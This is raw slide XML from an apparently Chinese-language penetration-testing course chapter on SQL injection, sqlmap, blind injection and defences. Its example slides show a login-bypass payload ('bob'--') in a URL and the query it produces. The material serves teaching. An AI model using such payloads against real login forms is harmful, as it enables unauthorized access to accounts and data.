                <a:gd name="connsiteY13" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX14" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX15" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1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1403883" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927024" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927025" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1478222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1859708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1955080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1573594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85F87891-8299-4375-87F6-4940389DCE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1819" y="0"/>
            <a:ext cx="11875110" cy="7232650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202711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AD2B354-15D3-4C8A-85D2-33CEBD4C936C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32BF82D2-7A68-459D-A996-9BDDA2518FA4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2022/2/9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="页脚占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5F0C88-FD5F-4486-9D89-3C4F82CAA17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7E7975B-E11E-4432-97B8-B813496B2D4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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802390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4039" y="385072"/>
            <a:ext cx="11090672" cy="139797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4039" y="1925358"/>
            <a:ext cx="11090672" cy="458905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84039" y="6703595"/>
            <a:ext cx="2893219" cy="385072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1266">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{32BF82D2-7A68-459D-A996-9BDDA2518FA4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2022/2/9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4259461" y="6703595"/>
            <a:ext cx="4339828" cy="385072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1266">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81492" y="6703595"/>
            <a:ext cx="2893219" cy="385072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1266">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1p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336246420"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483872" r:id="rId1"/>
    <p:sldLayoutId id="2147483873"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64326"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4326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="482163" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="964326" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1446489" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1928652" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2410816" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2892979" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3375142" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1898" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3857305" algn="l" defTabSz="964326" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1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30755" y="34486"/>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1964879" y="880021"/>
            <a:ext cx="10657184" cy="5324535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400"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第十一章   </a:t>
            </a:r>
            <a:r>
              <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渗透实战基础</a:t>
            </a:r>
            <a:endPar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SQL</a:t>
            </a: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注入漏洞</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SQLMAP</a:t>
            </a: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知识点三：</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SQL</a:t>
            </a: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盲注</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知识点四：</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SQL</a:t>
            </a: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注入的防御措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29377052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C2C10BBA-5284-4DE4-B3EF-5AA3F21B4767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4988967" y="2602942"/>
            <a:ext cx="6337525" cy="913943"/>
            <a:chOff x="4628925" y="2772296"/>
            <a:chExt cx="6337525" cy="913943"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="矩形: 圆角 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87241FC3-3951-4B29-A35E-6865000E3461}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4628925" y="2772296"/>
              <a:ext cx="6337525" cy="913943"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9364"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="109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4450DCAF-6D15-46D6-B3BB-4E2A0FE3BA77}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4875058" y="2829414"/>
              <a:ext cx="5746344" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>http://xxxx.com/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>xxx.php?user</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>=bob’--&amp;passwd=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>xxxxxx</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A7EEB11-B394-4237-B0CD-123F493A4606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4988966" y="4348117"/>
            <a:ext cx="6337525" cy="913943"/>
            <a:chOff x="4628923" y="4517471"/>
            <a:chExt cx="6337525" cy="913943"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="矩形: 圆角 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0350694-83A3-466D-9193-90EE64653CDA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4628923" y="4517471"/>
              <a:ext cx="6337525" cy="913943"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9364"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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6B628287-D88D-4F47-8B48-AF3798CA22A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4887485" y="4574589"/>
              <a:ext cx="5877933" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SELECT * FROM table WHERE user=’bob’--’ and password=’abc123’</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形: 圆角 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B96298A-C26A-4B86-82BA-0EA2A0C9F341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316807" y="2104157"/>
            <a:ext cx="3816426" cy="1912960"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9364"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1092F1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="109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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C67AF7E2-497B-4B83-8C7E-B8BFFACB9C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1316807" y="736005"/>
            <a:ext cx="10009112" cy="1080120"/>
            <a:chOff x="2180902" y="1168054"/>
            <a:chExt cx="10009112" cy="1080120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="组合 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C82BAAB-5217-498B-A738-BCBFF519D915}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2180902" y="1168054"/>
              <a:ext cx="10009112" cy="1080120"/>
              <a:chOff x="4197126" y="2392190"/>
              <a:chExt cx="10009112" cy="1080120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="矩形 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB5D987-47AF-4404-A0EF-8F995B4AA3C3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4197126" y="2392190"/>
                <a:ext cx="9664637" cy="936104"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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6" name="矩形 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99A04C4D-2919-43E0-B580-016CDF6B8128}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4341143" y="2536206"/>
                <a:ext cx="9865095" cy="936104"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="25400">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5" name="矩形 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9949121A-1103-426B-AA7D-A1C6560F8D3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1426179"/>
              <a:ext cx="9505627" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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但是，如果用户发送的请求的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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user</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US"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是修改过的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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查询，那么这个模式就可能会导致</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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注入安全漏洞。</a:t>
              </a:r>
              <a:endPar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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65A2800-BE72-4803-A120-FF89B9190604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460824" y="2104157"/>
            <a:ext cx="3630259" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>例如，如果用户将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的内容以“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bob </a:t>
            </a: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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>来提交，则单引号用于截断前面的字符串，注释符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>后面的内容将会被注释掉，如下所示：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{104B4558-3B58-484E-87FC-4782CE07EE56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1316807" y="4291000"/>
            <a:ext cx="3816426" cy="1028179"/>
            <a:chOff x="1316807" y="4291000"/>
            <a:chExt cx="3816426" cy="1028179"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="矩形: 圆角 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B95957F-FDB6-4E65-87A9-9B121DD6DB35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1316807" y="4291000"/>
              <a:ext cx="3816426" cy="1028179"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9364"/>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5FE06BF4-51C1-4365-9B05-AE5D7B2F3B85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
